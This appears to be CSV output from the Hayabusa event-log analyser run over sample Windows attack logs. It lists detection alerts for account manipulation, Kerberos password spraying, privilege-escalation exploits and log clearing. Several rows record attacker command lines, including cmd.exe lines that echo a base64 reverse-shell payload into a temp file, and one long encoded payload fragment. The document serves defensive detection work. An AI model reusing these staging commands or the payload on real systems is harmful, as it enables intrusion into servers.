2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 
0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx 2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx 2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx 2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx 2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Local Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 
0x80e25b9,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx 2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx 2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx 2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx 2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx 2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 
+09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-25 02:20:29.872 +09:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx 2020-07-27 07:26:14.522 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 
+09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 
00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:14.380 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:14.653 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:14.927 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:15.201 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:15.474 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 7F3smDkAAKGIA0EAwchAhcmjiANBRvIGM8BA5WzDjVX4UujXGAAAg8Q5hcAPVoIAlgD/FWDAQACjVAlBAOjo6f//scB1c1ApUHhF/FDE7O//8oXgdAlMIjYAOYu2hpGLTfxoJPRYAFHoYfb//42VPf7///dqApcV0MFABoXArTlmi4Vo/v//PAJ16jPJisyEYXV+i1WHUhViswDrYEX8IVNpRPuSg8QIMz+L2V0w/xXUwUAAuBEAAACL5W/ykMqIA0EAyKOnA7kAlFboduon//8V1MFAAKFUCUHjUP+7ZOJAAMOQOJCNkJArkJCQkFWL7IpFZNqobHqXi0UImMcAALcAk7iHEQEAXcIQAIt9DOj/AAQAvDQTi00IuPgAAABfxwEAAwAAXcIQAFPKahBWaCQwBvPQcQTl//+LdQgzu4kGiUgEixaJegiL3408v4kYi0Qj57aJSgyLBoTiiTuSELA2ixaJiv8gAACLBomIGDAAAOjH6f/5iw5XU4mBHDC/AOi4zv//ixZeW1+JgiAwAAAzwDPCEACQkJCpkJCQVYSmi0UIU1ZXi0gEi1AIO8p1DF9euMsAAABbXQEIAJaQijBDAItdDI0niYtnjTyKuQUAAADzpf1TBEoBAAAAO9EPheIAOXOLUwyLMgSKUwiE0XQvi1AMM8mF0nYPjXAQOT50CBaDWwQ7ynLJO8p1E4H6ACwAAHMLiXyIEItIDEGJSBn2QwgEdD6LkBAQAAAzroXSBIGNrRQQAGE5PnQIQeZ5BDvKHPQ7ynUclfoABAAA2BSJvIgDWAAAi9UQEAAAQYmI/Y+NAPZDCHJ0PkGQFCD4ADMZT9J2SI2wGCAAAMI+dAj2g8apO8rD9DvKdRyB+gAEAABzD4m83RggAACLiBRlACRBiYgUIOEVFehfMCIAfgaJuBgwAACLSARf3m6JSAShwFtdwkopHF64CQAAACZdEggAkJBmkJBKo5CQkJBVYCCD/wiLRQxTVleDeLwBD4V3AQB5iw
